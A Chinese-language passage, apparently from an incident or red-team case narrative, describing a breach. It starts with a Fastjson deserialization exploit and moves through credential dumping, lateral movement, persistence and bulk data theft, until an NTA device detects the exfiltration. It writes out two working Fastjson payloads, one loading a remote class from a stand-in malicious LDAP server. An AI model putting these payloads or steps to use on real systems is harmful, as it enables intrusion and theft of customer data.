{"@type":"java.net.InetAddress","val":"dnslog.cn"},成功触发DNSLOG回显,确认存在Fastjson反序列化漏洞。随后使用{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://恶意服务器/Exploit","autoCommit":true}的LDAP带外payload,成功加载恶意类,建立Cobalt Strike Beacon会话。whoami确认权限为Web应用用户。使用mimikatz抓取本地管理员凭据失败后,转而利用SharpHound收集域信息。发现一台MySQL数据库服务器未配置防火墙规则,通过SMB横向移动到该服务器,并使用procdump转储lsass进程,成功获取域用户凭证。随后在域控服务器上使用SchTask创建计划任务,实现权限维持。sqlcmd导出150万条用户订单数据(含银行卡号后4位、收货地址),压缩为1.2GB的加密zip包。然而,在通过HTTPS向境外服务器传输数据时,流量被公司新部署的NTA设备捕捉。NTA基于机器学习模型检测到异常大文件上传行为,触发高等级告警。